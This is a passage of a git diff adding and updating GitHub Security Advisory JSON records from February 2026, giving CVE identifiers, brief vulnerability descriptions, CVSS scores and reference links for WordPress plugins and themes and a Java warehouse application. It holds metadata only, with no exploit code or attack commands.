--- a/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json
+++ b/advisories/unreviewed/2026/02/GHSA-gq95-fxhv-hvcp/GHSA-gq95-fxhv-hvcp.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-gq95-fxhv-hvcp",
- "modified": "2026-02-19T18:31:53Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:53Z",
 "aliases": [
 "CVE-2026-25451"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in boldthemes Bold Page Builder bold-page-builder allows Stored XSS.This issue affects Bold Page Builder: from n/a through <= 5.6.4.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:24Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json
new file mode 100644
index 0000000000000..6bf8778540ce5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gv3f-578r-jhf3/GHSA-gv3f-578r-jhf3.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gv3f-578r-jhf3",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67990"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in RealMag777 GMap Targeting gmap-targeting allows Reflected XSS.This issue affects GMap Targeting: from n/a through <= 1.1.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67990"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/gmap-targeting/vulnerability/wordpress-gmap-targeting-plugin-1-1-7-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:05Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json b/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json
new file mode 100644
index 0000000000000..80e65b36ba9e5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gv8w-m9x9-cvqj/GHSA-gv8w-m9x9-cvqj.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gv8w-m9x9-cvqj",
+ "modified": "2026-02-20T18:31:40Z",
+ "published": "2026-02-20T18:31:40Z",
+ "aliases": [
+ "CVE-2026-2851"
+ ],
+ "details": "A vulnerability was determined in yeqifu warehouse up to aaf29962ba407d22d991781de28796ee7b4670e4. This vulnerability affects the function addInport/updateInport/deleteInport of the file dataset\\repos\\warehouse\\src\\main\\java\\com\\yeqifu\\bus\\controller\\InportController.java of the component Inport Endpoint. Executing a manipulation can lead to improper access controls. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2851"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/62"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse/issues/62#issue-3846670634"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/yeqifu/warehouse"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347087"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347087"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754430"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T18:25:54Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json b/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json
new file mode 100644
index 0000000000000..e95d8dd187f0f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gvgc-7vpx-c4jp/GHSA-gvgc-7vpx-c4jp.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gvgc-7vpx-c4jp",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2025-67547"
+ ],
+ "details": "Missing Authorization vulnerability in uixthemes Konte konte allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Konte: from n/a through <= 2.4.6.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67547"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/konte/vulnerability/wordpress-konte-theme-2-4-6-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json b/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json
new file mode 100644
index 0000000000000..910304f6a217e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gxg3-7vjc-h392/GHSA-gxg3-7vjc-h392.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gxg3-7vjc-h392",
+ "modified": "2026-02-20T18:31:36Z",
+ "published": "2026-02-20T18:31:36Z",
+ "aliases": [
+ "CVE-2025-69309"
+ ],
+ "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TeconceTheme Saasplate Core saasplate-core allows Blind SQL Injection.This issue affects Saasplate Core: from n/a through <= 1.2.8.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69309"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/saasplate-core/vulnerability/wordpress-saasplate-core-plugin-1-2-8-sql-injection-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:19Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json b/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json
new file mode 100644
index 0000000000000..a72d2f4ef0574
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h886-6wvm-63qx/GHSA-h886-6wvm-63qx.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h886-6wvm-63qx",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67998"
+ ],
+ "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in kamleshyadav Miraculous Elementor miraculous-el allows Authentication Abuse.This issue affects Miraculous Elementor: from n/a through <= 2.0.7.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67998"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/miraculous-el/vulnerability/wordpress-miraculous-elementor-plugin-2-0-7-broken-authentication-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:06Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json b/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json
new file mode 100644
index 0000000000000..b3b834bd5c8f4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h8g5-mfv5-4rp9/GHSA-h8g5-mfv5-4rp9.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h8g5-mfv5-4rp9",
+ "modified": "2026-02-20T18:31:35Z",
+ "published": "2026-02-20T18:31:35Z",
+ "aliases": [
+ "CVE-2025-68542"
+ ],
+ "details": "Missing Authorization vulnerability in vgdevsolutions Checkout Gateway for IRIS checkout-gateway-iris allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Checkout Gateway for IRIS: from n/a through <= 1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68542"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/checkout-gateway-iris/vulnerability/wordpress-checkout-gateway-for-iris-plugin-1-3-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json
new file mode 100644
index 0000000000000..43499f385ad23
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h8h3-mqvc-hwrf/GHSA-h8h3-mqvc-hwrf.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h8h3-mqvc-hwrf",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22368"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Redy redy allows PHP Local File Inclusion.This issue affects Redy: from n/a through <= 1.0.2.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22368"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/redy/vulnerability/wordpress-redy-theme-1-0-2-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:35Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json
new file mode 100644
index 0000000000000..bfd7ac10f2ae4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h93r-xq5m-hv3w/GHSA-h93r-xq5m-hv3w.json
@@ -0,0 +1,29 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h93r-xq5m-hv3w",
+ "modified": "2026-02-20T18:31:39Z",
+ "published": "2026-02-20T18:31:39Z",
+ "aliases": [
+ "CVE-2026-26725"
+ ],
+ "details": "An issue in edu Business Solutions Print Shop Pro WebDesk v.18.34 allows a remote attacker to escalate privileges via the AccessID parameter.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26725"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/chndlrx/vulnerability-disclosures/tree/main/CVE-2026-26725"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T17:25:55Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json b/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json
new file mode 100644
index 0000000000000..a7cc69271c1a5
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-h94h-v9gq-74g7/GHSA-h94h-v9gq-74g7.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-h94h-v9gq-74g7",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67624"
+ ],
+ "details": "Missing Authorization vulnerability in Arya Dhiratara Optimize More! – Images optimize-more-images allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Optimize More! – Images: from n/a through <= 1.1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67624"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/optimize-more-images/vulnerability/wordpress-optimize-more-images-plugin-1-1-3-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:02Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json
new file mode 100644
index 0000000000000..a2aaea7acfba6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-hc23-qvrh-v59g/GHSA-hc23-qvrh-v59g.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-hc23-qvrh-v59g",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22370"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in axiomthemes Marveland marveland allows PHP Local File Inclusion.This issue affects Marveland: from n/a through <= 1.3.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22370"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/marveland/vulnerability/wordpress-marveland-theme-1-3-0-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:36Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json
new file mode 100644
index 0000000000000..59f259e688502
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-hc97-m5vw-hgpf/GHSA-hc97-m5vw-hgpf.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-hc97-m5vw-hgpf",
+ "modified": "2026-02-20T18:31:37Z",
+ "published": "2026-02-20T18:31:37Z",
+ "aliases": [
+ "CVE-2025-69385"
+ ],
+ "details": "Missing Authorization vulnerability in AgniHD Cartify - WooCommerce Gutenberg WordPress Theme cartify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Cartify - WooCommerce Gutenberg WordPress Theme: from n/a through <= 1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69385"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/cartify/vulnerability/wordpress-cartify-woocommerce-gutenberg-wordpress-theme-theme-1-3-arbitrary-content-deletion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:23Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json b/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json
index 378b2abd4a0a8..843e981ea922a 100644
--- a/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json
+++ b/advisories/unreviewed/2026/02/GHSA-hrxh-f933-qcp6/GHSA-hrxh-f933-qcp6.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hrxh-f933-qcp6",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T18:31:27Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25313"
 ],
 "details": "Missing Authorization vulnerability in Shahjahan Jewel FluentForm fluentform allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FluentForm: from n/a through <= 6.1.14.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:15Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json b/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json
new file mode 100644
index 0000000000000..ecd4ce1176614
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-hx9h-rh37-jg32/GHSA-hx9h-rh37-jg32.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-hx9h-rh37-jg32",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22379"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in AncoraThemes Netmix netmix allows PHP Local File Inclusion.This issue affects Netmix: from n/a through <= 1.0.10.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22379"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/netmix/vulnerability/wordpress-netmix-theme-1-0-10-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json b/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json
new file mode 100644
index 0000000000000..000dd5416e274
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j368-q2mr-vhv4/GHSA-j368-q2mr-vhv4.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j368-q2mr-vhv4",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22341"
+ ],
+ "details": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Case-Themes Booked booked allows Authentication Abuse.This issue affects Booked: from n/a through <= 3.0.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22341"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/booked/vulnerability/wordpress-booked-plugin-3-0-0-account-takeover-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json b/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json
new file mode 100644
index 0000000000000..7f7b10314377f
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j3pj-q5qg-g2r8/GHSA-j3pj-q5qg-g2r8.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j3pj-q5qg-g2r8",
+ "modified": "2026-02-20T18:31:38Z",
+ "published": "2026-02-20T18:31:38Z",
+ "aliases": [
+ "CVE-2026-22381"
+ ],
+ "details": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes PawFriends - Pet Shop and Veterinary WordPress Theme pawfriends allows PHP Local File Inclusion.This issue affects PawFriends - Pet Shop and Veterinary WordPress Theme: from n/a through <= 1.3.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22381"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Theme/pawfriends/vulnerability/wordpress-pawfriends-pet-shop-and-veterinary-wordpress-theme-theme-1-3-local-file-inclusion-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-98"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:37Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json b/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json
new file mode 100644
index 0000000000000..d537fa7736161
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j4g8-p5xf-cx8j/GHSA-j4g8-p5xf-cx8j.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j4g8-p5xf-cx8j",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67970"
+ ],
+ "details": "Missing Authorization vulnerability in vertim Schedula schedula-smart-appointment-booking allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Schedula: from n/a through <= 1.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67970"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/schedula-smart-appointment-booking/vulnerability/wordpress-schedula-plugin-1-0-broken-access-control-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:03Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json
new file mode 100644
index 0000000000000..05508e3ee2c20
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-j69g-gh5p-j2j3/GHSA-j69g-gh5p-j2j3.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-j69g-gh5p-j2j3",
+ "modified": "2026-02-20T18:31:34Z",
+ "published": "2026-02-20T18:31:34Z",
+ "aliases": [
+ "CVE-2025-67978"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in FixBD Educare educare allows Reflected XSS.This issue affects Educare: from n/a through <= 1.6.1.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67978"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/educare/vulnerability/wordpress-educare-plugin-1-6-1-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:04Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json b/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json
new file mode 100644
index 0000000000000..27e1cd390761e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jcgh-3xqc-4hgp/GHSA-jcgh-3xqc-4hgp.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jcgh-3xqc-4hgp",
+ "modified": "2026-02-20T18:31:33Z",
+ "published": "2026-02-20T18:31:33Z",
+ "aliases": [
+ "CVE-2024-50555"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Elementor Website Builder elementor allows Stored XSS.This issue affects Elementor Website Builder: from n/a through <= 3.29.0.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50555"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/Wordpress/Plugin/elementor/vulnerability/wordpress-elementor-website-builder-plugin-3-29-0-cross-site-scripting-xss-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T16:22:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json b/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json
new file mode 100644
index 0000000000000..fecc480f431b2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-jf9p-r93v-rw24/GHSA-jf9p-r93v-rw24.json
@@ -0,0 +1,31 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-jf9p-r93v-rw24",
